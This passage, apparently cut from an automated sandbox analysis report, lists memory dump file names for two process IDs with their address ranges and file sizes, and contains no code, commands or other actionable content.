                                                        • memory/2228-311-0x00007FF9A8E00000-0x00007FF9A8E25000-memory.dmp

                                                          Filesize

                                                          148KB

                                                        • memory/2228-360-0x00007FF995160000-0x00007FF995693000-memory.dmp

                                                          Filesize

                                                          5.2MB

                                                        • memory/2228-362-0x00007FF9ACB50000-0x00007FF9ACB5F000-memory.dmp

                                                          Filesize

                                                          60KB

                                                        • memory/2228-373-0x00007FF995D50000-0x00007FF995E6A000-memory.dmp

                                                          Filesize

                                                          1.1MB

                                                        • memory/2228-78-0x00007FF9A4FC0000-0x00007FF9A4FCD000-memory.dmp

                                                          Filesize

                                                          52KB

                                                        • memory/2228-371-0x00007FF9A9950000-0x00007FF9A9964000-memory.dmp

                                                          Filesize

                                                          80KB

                                                        • memory/2228-370-0x00007FF995E70000-0x00007FF995F3E000-memory.dmp

                                                          Filesize

                                                          824KB

                                                        • memory/2228-369-0x00007FF9A4FD0000-0x00007FF9A5003000-memory.dmp

                                                          Filesize

                                                          204KB

                                                        • memory/2228-368-0x00007FF9A4F20000-0x00007FF9A4F2D000-memory.dmp

                                                          Filesize

                                                          52KB

                                                        • memory/2228-367-0x00007FF9A4A40000-0x00007FF9A4A59000-memory.dmp

                                                          Filesize

                                                          100KB

                                                        • memory/2228-366-0x00007FF9A4210000-0x00007FF9A438F000-memory.dmp

                                                          Filesize

                                                          1.5MB

                                                        • memory/2228-365-0x00007FF9A4AC0000-0x00007FF9A4AE4000-memory.dmp

                                                          Filesize

                                                          144KB

                                                        • memory/2228-364-0x00007FF9A4F30000-0x00007FF9A4F49000-memory.dmp

                                                          Filesize

                                                          100KB

                                                        • memory/2228-363-0x00007FF9A5B30000-0x00007FF9A5B5C000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/4392-82-0x00007FF9945E3000-0x00007FF9945E5000-memory.dmp

                                                          Filesize

                                                          8KB

                                                        • memory/4392-97-0x00000254F0770000-0x00000254F0792000-memory.dmp

                                                          Filesize

                                                          136KB